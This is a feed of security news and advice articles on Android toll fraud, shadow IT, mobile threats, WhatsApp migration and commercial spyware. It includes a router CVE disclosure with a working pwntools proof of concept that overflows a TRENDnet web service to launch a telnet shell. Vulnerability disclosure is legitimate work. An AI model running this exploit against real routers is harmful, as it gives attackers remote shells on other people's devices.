Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.
Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent

Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.

Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent.

It's also different from other fleeceware threats in that the malicious functions are only carried out when a compromised device is connected to one of its target network operators.

"It also, by default, uses cellular connection for its activities and forces devices to connect to the mobile network even if a Wi-Fi connection is available," Dimitrios Valsamaras and Sang Shin Jung of the Microsoft 365 Defender Research Team said in an exhaustive analysis.

"Once the connection to a target network is confirmed, it stealthily initiates a fraudulent subscription and confirms it without the user's consent, in some cases even intercepting the one-time password (OTP) to do so."

Such apps are also known to suppress SMS notifications related to the subscription to prevent the victims from becoming aware of the fraudulent transaction and unsubscribing from the service.

At its core, toll fraud takes advantage of the payment method which enables consumers to subscribe to paid services from websites that support the Wireless Application Protocol (WAP). This subscription fee gets charged directly to the users' mobile phone bills, thus obviating the need for setting up a credit or debit card or entering a username and password.

"If the user connects to the internet through mobile data, the mobile network operator can identify him/her by IP address," Kaspersky noted in a 2017 report about WAP billing trojan clickers. "Mobile network operators charge users only if they are successfully identified."

Optionally, some providers can also require OTPs as a second layer of confirmation of the subscription prior to activating the service.

"In the case of toll fraud, the malware performs the subscription on behalf of the user in a way that the overall process isn't perceivable," the researchers said. "The malware will communicate with a \[command-and-control\] server to retrieve a list of offered services."

It achieves this by first turning off Wi-Fi and turning on mobile data, followed by making use of JavaScript to stealthily subscribe to the service, and intercepting and sending the OTP code (if applicable) to complete the process.

The JavaScript code, for its part, is designed to click on HTML elements that contain keywords such as "confirm," "click," and "continue" to programmatically initiate the subscription.

Upon a successful fraudulent subscription, the malware either conceals the subscription notification messages or abuses its SMS permissions to delete incoming SMS messages containing information about the subscribed service from the mobile network operator.

Toll fraud malware is also known to cloak its malicious behavior by means of dynamic code loading, a feature in Android that allows apps to pull additional modules from a remote server during runtime, making it ripe for abuse by malicious actors.

From a security standpoint, this also means that a malware author can fashion an app such that the rogue functionality is only loaded when certain prerequisites are met, effectively defeating static code analysis checks.

"If an app allows dynamic code loading and the dynamically loaded code is extracting text messages, it will be classified as a backdoor malware," Google lays out in developer documentation about potentially harmful applications (PHAs).

With an install rate of 0.022%, toll fraud apps accounted for 34.8% of all PHAs installed from the Android app marketplace in the first quarter 2022, ranking below spyware. Most of the installations originated from India, Russia, Mexico, Indonesia, and Turkey.

To mitigate the threat of toll fraud malware, it's recommended that users install applications only from the Google Play Store or other trusted sources, avoid granting excessive permissions to apps, and consider upgrading to a new device should it stop receiving software updates.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps

Shadow IT refers to the practice of users deploying unauthorized technology resources in order to circumvent their IT department. Users may resort to using shadow IT practices when they feel that existing IT policies are too restrictive or get in the way of them being able to do their jobs effectively.
An old school phenomenon 
Shadow IT is not new. There have been countless examples of

Shadow IT refers to the practice of users deploying unauthorized technology resources in order to circumvent their IT department. Users may resort to using shadow IT practices when they feel that existing IT policies are too restrictive or get in the way of them being able to do their jobs effectively.

**An old school phenomenon**

Shadow IT is not new. There have been countless examples of widespread shadow IT use over the years. In the early 2000s, for example, many organizations were reluctant to adopt Wi-Fi for fear that it could undermine their security efforts. However, users wanted the convenience of wireless device usage and often deployed wireless access points without the IT department's knowledge or consent.

The same thing happened when the iPad first became popular. IT departments largely prohibited iPads from being used with business data because of the inability to apply group policy settings and other security controls to the devices. Even so, users often ignored IT and used iPads anyway.

Of course, IT pros eventually figured out how to secure iPads and Wi-Fi and eventually embraced the technology. However, shadow IT use does not always come with a happy ending. Users who engage in shadow IT use can unknowingly do irreparable harm to an organization.

Even so, the problem of shadow IT use continues to this day. If anything, shadow IT use has increased over the last several years. In 2021 for example, Gartner found that between 30% and 40% of all IT spending (in a large enterprise) goes toward funding shadow IT.

**Shadow IT is on the rise in 2022****Remote work post-pandemic**

One reason for the rise in shadow IT use is remote work. When users are working from home, it is easier for them to escape the notice if the IT department than it might be if they were to try using unauthorized technology from within the corporate office. A study by Core found that remote work stemming from COVID requirements increased shadow IT use by 59%.

**Tech is getting simpler for end-users**

Another reason for the increase in shadow IT is the fact that it is easier than ever for a user to circumvent the IT department. Suppose for a moment that a user wants to deploy a particular workload, but the IT department denies the request.

A determined user can simply use their corporate credit card to set up a cloud account. Because this account exists as an independent tenant, IT will have no visibility into the account and may not even know that it exists. This allows the user to run their unauthorized workload with total impunity.

In fact, a 2020 study found that 80% of workers admitted to using unauthorized SaaS applications. This same study also found that the average company's shadow IT cloud could be 10X larger than the company's sanctioned cloud usage.

**Know your own network**

Given the ease with which a user can deploy shadow IT resources, it is unrealistic for IT to assume that shadow IT isn't happening or that they will be able to detect shadow IT use. As such, the best strategy may be to educate users about the risks posed by shadow IT. A user who has a limited IT background may inadvertently introduce security risks by engaging in shadow IT. According to a Forbes Insights report 60% of companies do not include shadow IT in their threat assessments.

Similarly, shadow IT use can expose an organization to regulatory penalties. In fact, it is often compliance auditors – not the IT department – who end up being the ones to discover shadow IT use.

Of course, educating users alone is not sufficient to stopping shadow IT use. There will always be users who choose to ignore the warnings. Likewise, giving in to user's demands for using particular technologies might not always be in the organization's best interests either. After all, there is no shortage of poorly written or outdated applications that could pose a significant threat to your organization. Never mind applications that are known for spying on users.

**The zero-trust solution to Shadow IT**

One of the best options for dealing with shadow IT threats may be to adopt zero trust. Zero-trust is a philosophy in which nothing in your organization is automatically assumed to be trustworthy. User and device identities must be proven each time that they are used to access a resource.

There are many different aspects to a zero-trust architecture, and each organization implements zero-trust differently. Some organizations for instance, use conditional access policies to control access to resources. That way, an organization isn't just granting a user unrestricted access to a resource, but rather is considering how the user is trying to access the resource. This may involve setting up restrictions around the user's geographic location, device type, time of day, or other factors.

**Zero-trust at the helpdesk**

One of the most important things that an organization can do with regard to implementing zero trust is to better secure its helpdesk. Most organizations' help desks are vulnerable to social engineering attacks.

When a user calls and requests a password reset, the helpdesk technician assumes that the user is who they claim to be, when in reality, the caller could actually be a hacker who is trying to use a password reset request as a way of gaining access to the network. Granting password reset requests without verifying user identities goes against everything that zero trust stands for.

Specops Software's Secure Service Desk can eliminate this vulnerability by making it impossible for a helpdesk technician to reset a user's password until that user's identity has been proven. You can test it out for free to reduce the risks of shadow IT in your network.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

What is Shadow IT and why is it so risky?

Shrav Mehta, CEO, Secureframe, outlines the top six bad habits security teams need to break to prevent costly breaches, ransomware attacks and prevent phishing-based endpoint attacks.

Shrav Mehta, CEO, Secureframe, outlines the top six bad habits security teams need to break to prevent costly breaches, ransomware attacks and prevent phishing-based endpoint attacks.

Cybercrime is on the rise, and attacks are getting faster, more nuanced and increasingly sophisticated. The number of cyberattack-related data breaches rose 27 percent in 2021 — an upward trend that shows no signs of slowing down.

Bad security habits, such as using the same password more than once may seem innocuous, but unchecked bad behavior or security habits can leave your organization open to a devastating breach.

Bad security habits cost businesses millions of dollars. Consider this, the average cost of a data breach reached $4.24 million per incident in 2021, the highest in 17 years.

If a hacker compromises your servers and steals confidential data, it could spell the end of your company. This list covers 6 of the most common bad security habits and how to fix them so you can protect your data and prevent malicious attacks.

**1\. Poor Password Hygiene**

More than 60 percent of all data breaches involve stolen or weak credentials. Using the same password, sharing passwords, writing passwords down on sticky notes — as security leaders, we’ve seen the same terrible password practices for years. Don’t make attackers’ jobs easier!

**Break the habit**: Establish a company-wide password policy, use a password manager, and enable multi-factor authentication to reduce the risk of unauthorized account access. Your password policy should include guidelines on creating strong passwords, how often passwords should be updated, and instructions on how to securely share passwords between employees.

**2\. Convoluted Processes and Policies**

From onboarding checklists to privacy policies, these documents should reflect how your team gets work done and be used during daily work — not drafted and then forgotten in a folder somewhere. You must think about these policies regularly and make improvements based on the challenges and risks observed.

**Break the habit:** Establish periodic policy reviews and acceptances for your team. Proactively ask for feedback to ensure the policies and processes reflect how your team actually gets work done and to garner company-wide buy-in.

**3\. Outdated Software and Non-secure Devices**

Remote work has been a growing trend for years, but the last two years have seen a seismic shift in where, when, and how teams work together. For all its benefits, the rise of work from home also brings significant security challenges.

More people are using unsecured Wi-Fi, mixing work and personal devices, skipping regular data backups and software updates, etc. Being the weakest link that ultimately brings your company to its knees will not be an enjoyable experience.

**Break the habit:** Use a device management solution for automatic software updates and patches, establish a mobile device policy, and encourage staff only to use company devices and a secure VPN to access sensitive data.

**4\. Lack of an Internal Audit Program**

Even if you’ve established appropriate security policies and procedures, you must treat them as living documents. Continuous testing and regular internal audits are essential to understanding how your security program is maturing (or not) and staying aware of emerging and escalating threats.

**Break the habit:** Create an internal audit program to review your security posture at least annually and identify opportunities for improvement. This will also ensure you stay aware of any changes to the threat landscape that you need to address.

**5\. Untrained Staff**

Phishing and malware are some of the most common sources of security incidents, including ransomware! Train staff on security best practices regularly and ensure everyone knows security is a company-wide priority.

**Break the habit:** Conduct security awareness training at least annually. Randomly and periodically test your employees/users to ensure they stay aware of and follow best practices.

**6\. Complacency**

Too many organizations believe that a breach or security incident won’t actually happen to them. Security and compliance is not just a concern for the IT department. Everyone across the organization — from the executive team and board of directors to the newest employee hire — should understand the threats facing the business and their roles and responsibilities in keeping customer and company data safe.

**Break the habit:** Make the effort to create a culture that prioritizes security and understands its importance. Ensure all employees understand their roles and responsibilities regarding keeping customer and business information safe and clearly communicate the benefits of following established policies and procedures.

Most security threats and risks are systemically preventable and can be addressed through common-sense approaches, continuous compliance testing, assessments, audits, and measurement. The more you can train your employees on these practical approaches, the more likely they will be able to successfully avoid a costly data breach or security incident.

**_Shrav Mehta, CEO, Secureframe, an automation compliance platform._**

Top Six Security Bad Habits, and How to Break Them

Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be. 
Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem?

Your smartphone is your daily companion. The chances are that most of our activities rely on them, from ordering food to booking medical appointments. However, the threat landscape always reminds us how vulnerable smartphones can be.

Consider the recent discovery by Oversecured, a security startup. These experts observed the dynamic code loading and its potential dangers. Why is this a problem? Well, the Google app uses code that does not come integrated with the app itself. Okay, this might sound confusing, but it all works in favor of optimizing certain processes. Thus, Google exploits code libraries pre-installed on Android phones to reduce their download size. In fact, many Android apps use this trick to optimize the storage space needed to run.

As revealed by Oversecured, perpetrators could compromise this retrieval of code from libraries. Instead of Google obtaining code from a reliable source, it could be tricked into taking code from malicious apps operating on the device in question. Thus, the malicious app could gain the same permissions as Google. And the latter giant typically gets access to your email, search history, call history, contacts, and more.

The scariest part: everything can happen without your knowledge. Let's discuss other spooky threats currently daunting mobile devices.

**Top Mobile Security Threats****Data Leaks**

When you download a new app on your smartphone and launch it, you must pay attention to the pop screen that appears. It is a permission popup, the request of providing a few permissions to the app. Sadly, granting extensive permissions to dangerous apps can have severe consequences. Hackers can hack the database where all this information is stored, and all your data can be leaked.

But, with some recent development in Android 11 and IOS 14, users can deny unnecessary permission requests or even grant them for one time only. Never give apps all the permissions, see what permission they need to run, and grant only those.

Therefore, it is crucial to protect the device by not using any public Wi-Fi hotspot. Remember, never get lured by a "Free Wi-Fi" hung hanged in any coffee shop, restaurant, or hotel.

**Spyware Pretending to be an Update**

Bug fixes, longevity, and overall safety boost are the three main reasons why you should always update your OS. However, there are cases when you must fight this instinct. If you find a random application called System Update, be wary of its true nature. As reported, this malicious Android threat pretends to be a system update. Sadly, its true intentions are much more sinister. Once installed (outside Google Play, which is already a dangerous practice), the app starts stealing victims' data. How? Well, it connects to the perpetrators' Firebase server, the tool used to take remote control of the infected device.

What can this spyware steal? Basically, anything. Your messages, contacts, browser bookmarks, and more are up for grabs. An even more frightening reality is that it can record phone calls, monitor your location, and steal photos.

**Malware via SMS Messages**

We all know the feeling of receiving bizarre SMS messages. But sometimes, such attempts are nothing but social engineering scams. A recently discovered TangleBot is one of the recent examples, stepping into the mobile threat landscape.

Apparently, the malware gets distributed via fake messages sent to users across the US and Canada. Mostly, they provide certain COVID-19 information and urge recipients to click on embedded links. If users click on the link, they are led into a website urging them to install an Adobe Flash update. If you decide to install it, TangleBot proudly enters your system. What can it do? Many things, from stealing data and taking control over certain apps.

**How to Defend Your Device?**

*   **Use updated operating systems**. Use only the latest operating systems like Android 11 and 12, as they have the newest security codes. However, install updates from reliable sources only. A random app floating online is not the right choice to keep your device up to date.
*   **Firewalls**. Always have a firewall securing your device. It works like a regular firewall. When your mobile device sends a request to a network, the firewall forwards a verification request to the network. Additionally, it contacts the database to verify the device.
*   **Be careful on app stores**. Even if you trust Google Play Store, do not install every app available. It is a known fact that many applications available are far from reliable. For instance, you could accidentally download cryptocurrency mining malware, banking Trojans, or intrusive adware.
*   **Use a VPN**. If you are in a position where you cannot avoid the use of public Wi-Fi, you need to download VPN apps. They will hide all your activities from hackers lurking on the network, and it will protect your sensitive information.
*   **Do not jailbreak your device**. iPhones can be somewhat restrictive. Thus, many might consider jailbreaking them to get the opportunity to customize their devices. However, a jailbroken smartphone is more vulnerable; you will likely lose your warranty and struggle to install the necessary updates.

**Conclusion**

The mobile threats are evolving with time, and they will keep on improving further as well. But that's not what we have to care about. The only thing that needs our concern is our security and privacy. Therefore, one must take all the precautionary measures to evade potential danger.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Overview of Top Mobile Security Threats in 2022

TRENDnet Wi-Fi routers TEW751DR v1.03 and TEW-752DRU v1.03 were discovered to contain a stack overflow via the function genacgi_main.

Vendor of the products:TRENDnet

Reported by: 　　　WangJincheng && FeiXincheng from X1cT34m

Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03

Vendor Homepage: https://www.trendnet.com/

Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165\_TEW-751DR , https://www.trendnet.com/support/support-detail.asp?prod=170\_TEW-752DRU

**summarize**

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the TrendNet Wi-Fi router firmware TEW751DR TEW-752DRU . In the genacgi_main function of the cgibin program, the sprintf method directly uses the service parameter from /gena.cgi. The attackers can construct a payload to carry out arbitrary code attacks.

**vulnerability description**

There is a stack overflow vulnerability in the genacgi_main function.

It calls the sub_40EC1C function.

However, in the sub_40EC1C function, it calls the sprintf function from a1 to v23 without any security check, which causes the stack overflow.

**poc**

    # python3
    from pwn import *
    from socket import *
    from os import *
    from time import *
    context(os = 'linux', arch = 'mips')
    
    libc_base = 0x2aaf8000
    
    s = socket(AF_INET, SOCK_STREAM)
    
    cmd = b'telnetd -p 7777;'
    payload = b'a'*462
    payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
    payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
    payload += b'a'*4 # s2
    payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
    payload += b'a'*0x18 # padding
    payload += cmd
    
    msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
    msg += b"Host: localhost:49152\r\n"
    msg += b"SID: 1\r\n\r\n"
    
    s.connect((gethostbyname("192.168.10.1"), 49152))
    s.send(msg)
    	
    sleep(1)
    system("telnet 192.168.10.1 7777")

CVE-2022-33007: CVE/bufferoverflow.md at main · fxc233/CVE

It's never been easier to switch between iPhone and Android—and to get your messages out of the Meta ecosystem entirely.

Since early 2016, WhatsApp has protected messages and conversations sent in its app with end-to-end encryption. This means that nobody other than the sender and receiver of messages can read their content—not even Meta can read or snoop on the contents of your conversations.

Despite WhatsApp being omnipresent—more than 2 billion people use it each month—securely moving your encrypted chats and photos to different platforms or apps has been a challenge. Transferring your WhatsApp chats from Android to iPhone and from iPhone to Android has historically only been possible using third-party apps. These apps are often fiddly and don’t necessarily protect your data at the level offered by WhatsApp’s ecosystem.

But in recent months WhatsApp has made it possible to officially switch between iPhones and Android (and vice versa), rolling out processes to securely move data between operating systems and working with phone manufacturers to enable the move.

If you’re fed up with Meta’s ecosystem, it’s also possible to move your groups and some chat data to other messaging apps. Here’s how to move all of your WhatsApp chats and backups.

Android to iPhone

Moving your WhatsApp account from Android to an iPhone involves a few steps. But it should be possible to bring most of your information with you: Your profile photo, individual and group chats, history, photos, videos, and settings can all make the jump from one device to another. Your call history and display name can’t be moved across, however, WhatsApp says.

Most of the work in moving your WhatsApp data comes before you make the shift. To move between devices, you need to ensure you have the same phone number on each. Before you start the process, make sure you have a recently updated version of WhatsApp on your Android phone. You also need to be running at least Android 5 on the device you’re moving from and iOS 15.5 on the iPhone you’re moving to. (The iPhone needs to be a new device or have been recently reset to its factory settings.)

Next, download and install the “Move to iOS” app from Google’s Play Store—this Apple-owned app will do all the heavy lifting. When you’re ready to migrate your data, plug both devices into a power source and connect both phones to the same Wi-Fi network. (If you don’t have a Wi-Fi network, it’s possible to use a hotspot to connect your Android phone to the iPhone.)

When both phones are on the same network, open up the “Move to iOS” app on the Android phone and follow the instructions to connect the two phones. Then select WhatsApp as the data source you want to transfer from, and the app will prepare your chats to be moved across—final prompts will confirm you want to make the switch.

This process will log you out of WhatsApp on your Android phone, and you’ll need to download the app on the iPhone you are moving to. When you first use WhatsApp on this iPhone, it’ll ask you to use the same number as on the Android device and prompt you to complete the transfer process. When the process is complete, if you are getting rid of your old phone, make sure to do a factory reset and wipe all your data.

iPhone to Android

It’s been possible to transfer your WhatsApp chat history from iPhones to Android devices since October 2021. This transfer process includes your photos, messages, voice messages, and group conversations.

The compatibility was first rolled out for Samsung phones but has since expanded to include Google Pixel phones and all devices running Android 12. To make the move, you’ll need a USB-C-to-Lightning cable to physically connect the two devices, Google explains. “When prompted while setting up your new Android device, scan a QR code on your iPhone to launch WhatsApp,” the company says in a blog post. Alternatively, in WhatsApp you can go to **Settings** > **Chats** > **Move Chats to Android** and follow the transfer prompts.

WhatsApp’s guide to moving your chats between iPhones and Samsung devices says you will need the Samsung SmartSwitch app installed on the new phone and the same phone number on both devices. As with moving from Android to an iPhone, make sure you delete or wipe your old phone if you’re getting rid of it.

WhatsApp to Signal

Signal is widely considered the best messaging app for security and privacy. Check out our guide to switching your text messages to Signal and moving your messages between devices. While you can’t directly move your WhatsApp chat history to Signal, there are some things you can do to make the switch more straightforward.

It’s possible to easily recreate your WhatsApp groups on Signal—although getting all your family and friends to ditch the Meta-owned app may be more of a challenge. To recreate your groups, open the Signal app and start a new group by tapping the **pencil icon**. When you are asked to add people from your contacts, **tap on Skip** and instead pick the option to get a link to invite people to the group (a QR code is also available). From here, you can share this link with your WhatsApp chats and allow people to move over.

WhatsApp to Telegram

Unlike Signal and WhatsApp, Telegram is not end-to-end encrypted by default. As a result, security experts often warn against using Telegram. However, if you still want to use Telegram, it’s possible to move your chat history from one app to the other.

On both iOS and Android, open the chat you want to move to Telegram and click on the chat’s name or details (using _⋮_ on Android). From here, tap **Export Chat** and when you get the choice of where to **share** the chat, pick Telegram. When exporting chats from WhatsApp to Telegram, you have the choice to take photos and videos with you, or just chat messages.

Back up your WhatsApp chats

You can also back up your WhatsApp conversations in the cloud. This allows you to keep your messages and photos safe if you’re moving from one iPhone to another iPhone or Android to Android—for instance, if you upgrade or break your device and replace it with one using the same operating system.

Until September 2021, WhatsApp didn’t end-to-end encrypt backups, creating a potential security risk and exposing people’s chats to requests from law enforcement. However, the company has since closed that loophole, so it’s now much less of a risk to have your chats backed up to iCloud or Google’s Cloud. To back up to either platform, you will need a Google Drive account or an iCloud account.

On Android, in WhatsApp go to **More options** > **Settings** > **Chats** > **Chat backup** > **Back up to Google Drive**. While on iOS go to WhatsApp **Settings** > **Chats** > **Chat Backup** > **Back Up Now**. You’ll then be able to set the frequency of your backups and elect whether data-heavy videos are included.

How to Move Your WhatsApp Chats Across Devices and Apps

The spyware has been used to target people in Italy, Kazakhstan, and Syria, researchers at Google and Lookout have found.

In hearings this week, the notorious spyware vendor NSO group told European legislators that at least five EU countries have used its powerful Pegasus surveillance malware. But as ever more comes to light about the reality of how NSO's products have been abused around the world, researchers are also working to raise awareness that the surveillance-for-hire industry goes far beyond one company. On Thursday, Google's Threat Analysis Group and Project Zero vulnerability analysis team published findings about the iOS version of a spyware product attributed to the Italian developer RCS Labs.

Google researchers say they detected victims of the spyware in Italy and Kazakhstan on both Android and iOS devices. Last week, the security firm Lookout published findings about the Android version of the spyware, which it calls “Hermit” and also attributes to RCS Labs. Lookout notes that Italian officials used a version of the spyware during a 2019 anti-corruption probe. In addition to victims located in Italy and Kazakhstan, Lookout also found data indicating that an unidentified entity used the spyware for targeting in northeastern Syria.

“Google has been tracking the activities of commercial spyware vendors for years, and in that time we have seen the industry rapidly expand from a few vendors to an entire ecosystem,” TAG security engineer Clement Lecigne tells WIRED. “These vendors are enabling the proliferation of dangerous hacking tools, arming governments that would not be able to develop these capabilities in-house. But there is little or no transparency into this industry, that's why it's critical to share information about these vendors and their capabilities.”

TAG says it currently tracks more than 30 spyware makers that offer an array of technical capabilities and levels of sophistication to government-backed clients.

In their analysis of the iOS version, Google researchers found that attackers distributed the iOS spyware using a fake app meant to look like the My Vodafone app from the popular international mobile carrier. In both Android and iOS attacks, attackers may have simply tricked targets into downloading what appeared to be a messaging app by distributing a malicious link for victims to click. But in some particularly dramatic cases of iOS targeting, Google found that attackers may have been working with local ISPs to cut off a specific user's mobile data connection, send them a malicious download link over SMS, and convince them to install the fake My Vodafone app over Wi-Fi with the promise that this would restore their cell service.

Attackers were able to distribute the malicious app because RCS Labs had registered with Apple's Enterprise Developer Program, apparently through a shell company called 3-1 Mobile SRL, to obtain a certificate that allows them to sideload apps without going through Apple's typical AppStore review process.

Apple tells WIRED that all of the known accounts and certificates associated with the spyware campaign have been revoked. 

“Enterprise certificates are meant only for internal use by a company, and are not intended for general app distribution, as they can be used to circumvent App Store and iOS protections,” the company wrote in an October report about sideloading. “Despite the program’s tight controls and limited scale, bad actors have found unauthorized ways of accessing it, for instance by purchasing enterprise certificates on the black market.”

Project Zero member Ian Beer conducted a technical analysis of the exploits used in the RCS Labs iOS malware. He notes that the spyware uses a total of six exploits to gain access to surveil a victim's device. While five are known and publicly circulating exploits for older iOS versions, the sixth was an unknown vulnerability at the time it was discovered. (Apple patched that vulnerability in December.) That exploit took advantage of structural changes in how data flows across Apple's new generations of “coprocessors” as the company, and the industry overall, moves toward the all-in-one “system-on-a-chip” design.

The exploit isn't unprecedented in its sophistication, but Google researchers note that the RCS Labs spyware reflects a broader trend in which the surveillance-for-hire industry combines existing hacking techniques and exploits with more novel elements to gain the upper hand. 

“The commercial surveillance industry benefits from and reuses research from the jailbreaking community. In this case, three out of six of the exploits are from public jailbreak exploits,” TAG member Benoit Sevens says. “We also see other surveillance vendors reusing techniques and infection vectors initially used and discovered by cyber crime groups. And like other attackers, surveillance vendors are not only using sophisticated exploits but are using social engineering attacks to lure their victims in.”

The research shows that while not all actors are as successful or well known as a company like NSO Group, many small and midsize players together in a burgeoning industry are creating real risk for internet users worldwide.

Google Warns of New Spyware Targeting iOS and Android Users

By Deeba Ahmed
Most people today depend on their phones entirely. Aside from being a portal to our social life, they…
This is a post from HackRead.com Read the original post: 5 Tips for Protecting Your Phone from Malware

Most people today depend on their phones entirely. Aside from being a portal to our social life, they also make our lives easier in many ways. One of the best things probably is paying with them and having the chance to check our bank account through them.

Connectivity to every area in our lives is also a target for hackers. Having our bank accounts and everything else on our phones drives criminals to try and get inside the software. We need to be fully protected and ensure no malware is installed on our phones.

In this article, we’re sharing some tips that will help ensure you’re safe. We will show you how to avoid installing malware and how to stay protected. Follow up and see what you must do if you want to avoid being a hacker’s target.

**1\. Download only trusted apps**

You can install malware by simply downloading a malicious app. Before downloading anything, you must do a background check on the app you’re about to download. Ensure the trustworthiness and see if the company behind it has a proven track record of providing safe products.

If you’re a business that develops apps, you must hire a product strategy consulting company and let them do everything in their power to turn your app into a trusted source for your clients. Without this, consumers will see your app as a potential threat and won’t download it.

**2\. Always update your OS and apps**

Outdated software is bait for hackers. It is seamless for hackers to intrude and damage your phone or steal vital information if you’re using outdated software. When you’re not updating, the backdoor entrances are wide open for hackers, who can easily use them to harm you.

When you have everything updated, the new versions block everything and everyone trying to intrude. No worm or virus will be able to access your data, which means you’re safe from malware issues, and you can rest assured you’re not getting attacked while you’re not watching.

**3\. Don’t open suspicious emails and files**

Emails are filled with phishing scams and files from unknown sources that may harm your phone. Computers usually have firewalls and antivirus or antimalware programs to detect such threats, but phones are rarely equipped with this kind of technology.

Don’t open all kinds of emails and files on your phone. If you open something like this on your phone, everything may get erased, and hackers may intrude into your bank accounts quickly. Save this action for your computer, where you’ll be much better protected.

**4\. Avoid using open and unsecured Wi-Fi networks**

Unprotected open Wi-Fi networks in public areas are almost constantly a target of pro or amateur hackers. They will invade everyone connected to the network and easily get inside your phone and install malware. When you see your phone downloading stuff on an open network, stop doing it immediately.

You can never know what’s being installed on your phone. Instead, turn off your Wi-Fi connection, and wait for a better time to update your software. Your phone won’t push the downloads if you’re connected through your data.

**5\. Do often scans and checks for malware and other threats**

Multiple programs and software are available for scanning and checking for malware, viruses, and everything else that may be damaging your phone. Search online for the best options and do regular checks.

You can schedule them to do this automatically or activate a quick scan when you have the time for it. Like there are antivirus programs for computers, there are for phones. They work the same and will clean your phone from harmful software.

**Conclusion**

You need to always be sure that you’re not hacked by someone. It’s too easy for someone to install devastating malware on your phone if you’re not careful. Therefore, you need to follow the instructions we talked about above.

If you follow the instructions, no one will be able to kidnap your phone and use the data on it. Your entire life is in your smartphone, so don’t let anyone get access to it. Stay protected by always having these tips in mind.

5 Tips for Protecting Your Phone from Malware

Comodo Antivirus 12.2.2.8012 has a quarantine flaw that allows privilege escalation. To escalate privilege, a low-privileged attacker can use an NTFS directory junction to restore a malicious DLL from quarantine into the System32 folder.

CVE-2022-34008: Download Free Antivirus Software | Get Complete PC Virus Protection

Security defenders working for large venues and international events need to be able to move at machine speed because they have a limited time to detect and recover from attacks. The show must go on, always.

Live events such as concerts and sports games are generally chock-full of action, both on the field and behind the scenes. IT and security teams managing these venues navigate a complex environment that includes a traditional corporate infrastructure, special equipment required for the event, a large army of suppliers and contractors, and all of the devices brought in by spectators. And the prospect of a cyberattack during the actual event always looms large.  

Securing live events can be the most complicated and most complex to protect, says Karim Benslimane, director of cyber intelligence at Darktrace. Running a stadium can be split into a “business perspective,” which is akin to managing the technology infrastructure for a very large enterprise, and the “event perspective,” which includes all the people and equipment involved with setting up and hosting the event itself.

“When there is no event doesn’t mean the IT guys don’t have anything to do,” Benslimane says. “They are already busy running the business.” He speaks from experience. Prior to joining Darktrace, he was head of information and communications technology and cybersecurity for various international venues and events.

**Understanding the Cyber Paradox**

The business infrastructure depends on much of the same technologies and enterprise applications – Active Directory, telephony, wired and wireless networking, ERP, CRM, databases, and e-commerce applications, to name just a few – as a large organization  requires to manage the day-to-day operations. Payroll needs to make sure people are paid, employees need to be able to communicate internally and with clients and customers, and tickets have to be printed and sold.

The event has its own infrastructure, and managing the event requires a completely different mindset because of what Benslimane refers to as the “cyber paradox.” The traditional security mindset is to deploy technology and control to add layers to make it harder for attackers to access systems and restrict what is added to the network. Setting up an event, by definition, involves hiring suppliers and contractors (along with their sub-suppliers and subcontractors) who bring their own assets and need access to the venue’s infrastructure, such as VoIP and Wi-Fi. For example, the venue may own the jumbo screens, but the immersive elements and special effects that make the event come alive are pushed onto the screens from third-party systems.

“From a cybersecurity point of view, it’s obviously a paradox where you are trying to secure your assets on the left, but on the right, you are forced to allow external people and external devices to come physically into your venue and use your infrastructure,” Benslimane says. It doesn’t make sense to talk about securing the perimeter when people are already inside, he notes.

On top of that is the live event itself, or “D-Day,” which requires letting even more people physically enter the venue with their own devices and access services such as Wi-Fi.

“It was a big challenge. You have nothing to control and protect you,” Benslimane says.

**Limited Time to Respond**

As the saying goes, the show must go on. Security teams in the events industry have to “rush and run” to mitigate security incidents as they occur so that the event can go off as scheduled and associated services (such as broadcasts and streaming contracts) are not impacted.

“If something happened during the 100-meter men’s final \[at the Olympics\] or the \[FIFA\] World Cup final, think about the brand impact,” Benslimane says. Interrupting the broadcast would mean millions of TV and screens will see a black screen, which would result in immense financial losses for the brand. There will be penalties from lost advertising. This would also affect the host country’s reputation.

Those were the same challenges Wired reporter Andy Greenberg wrote about in his book about Olympic Destroyer, the malware that knocked out the domain resolvers during the opening ceremonies. As a result of the attack, some attendees couldn’t print tickets to enter the stadium, the Wi-Fi network was offline, TVs around the stadium and other facilities could not show the ceremony, the RFID-based security gates for Olympic facilities were not working, and the official Olympic app was broken. If the systems remained offline after the opening ceremony ended, athletes, visiting dignitaries, and spectators would find they had no access to the Olympics app full of schedules, hotel information, and maps. 

“The result would be a humiliating confusion,” Andy Greenberg wrote for Wired.

Attackers realize that events can’t be delayed and take advantage of that time constraint to cause the most damage, Benslimane says. There is no time to recover when the match ends in a few minutes.

**Holding the Event Hostage**

Ransomware attacks encrypt documents and make it hard for organizations to function. A ransomware attack on a live event cripples the technology and interrupts the show. Cybercriminals clearly understand that the venue cannot postpone, or replay, D-Day. Imagine if a cyberattack disrupted the systems to the point that the game cannot continue, and the venue asks the crowd to leave and come back next week. 

“Just imagine the fights,” Benslimane says.

